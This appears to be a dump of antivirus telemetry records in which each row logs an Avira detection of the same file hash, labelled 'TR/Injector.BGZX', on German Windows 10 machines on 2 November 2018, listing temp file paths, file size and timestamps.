  Row(detection=Row(filename='avscan-20181102-055337-9c81682d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055337-9C81682D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051657-7d8f1905', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051657-7D8F1905', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055315-8f808125', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055315-8F808125', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061813-0c8a71d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061813-0C8A71D0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055345-a14a4b78', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055345-A14A4B78', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053642-3f7cf848', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053642-3F7CF848', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060817-a93bb866', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060817-A93BB866', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062546-1a62006e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062546-1A62006E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051630-6d87a5f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051630-6D87A5F0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051601-5c191dc0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051601-5C191DC0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055326-96706da5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055326-96706DA5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051632-6e387512', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051632-6E387512', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060817-a93fa3f6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060817-A93FA3F6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061813-0c64e2a1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061813-0C64E2A1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061733-f491b2dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061733-F491B2DD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051625-6a29c236', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051625-6A29C236', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061824-12e964a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061824-12E964A6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053624-34e0580d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053624-34E0580D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053624-3549b26b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053624-3549B26B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060817-a921fec6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060817-A921FEC6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051631-6e01ee9a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051631-6E01EE9A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062540-1733bbf2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062540-1733BBF2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061706-e49ad8ab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061706-E49AD8AB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061831-170a03a1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061831-170A03A1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061830-168fb0b1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061830-168FB0B1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055558-f0ab9bcd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055558-F0AB9BCD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062028-5d161c13', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062028-5D161C13', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062054-6c7cc91b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062054-6C7CC91B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062014-547e1697', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062014-547E1697', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051820-af155d04', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051820-AF155D04', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055110-45165cb9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055110-45165CB9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051852-c1c12f12', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051852-C1C12F12', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054659-afbc66c5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054659-AFBC66C5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051815-ac357761', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051815-AC357761', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055108-43e96dc7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055108-43E96DC7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062038-62ed806f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062038-62ED806F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055149-5c93ad9e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055149-5C93AD9E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055137-54eb57d3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055137-54EB57D3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062041-64dc0459', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062041-64DC0459', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055159-628e6b01', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055159-628E6B01', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055542-e762dd83', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055542-E762DD83', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054621-98adf894', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054621-98ADF894', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051853-c2574544', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051853-C2574544', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055149-5c6b03a8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055149-5C6B03A8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055509-d38c6bb5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055509-D38C6BB5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055108-4419f62b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055108-4419F62B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055509-d3c905c1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055509-D3C905C1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055123-4cba6f44', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055123-4CBA6F44', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051818-ad6c5b99', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051818-AD6C5B99', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051818-ad775fed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051818-AD775FED', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051817-acf3c05e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051817-ACF3C05E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055529-df819575', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055529-DF819575', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055537-e41373d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055537-E41373D0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055529-dfa27d8b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055529-DFA27D8B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055517-d86edd20', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055517-D86EDD20', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:16Z'), dt=datetime.date(2018, 11, 2)),
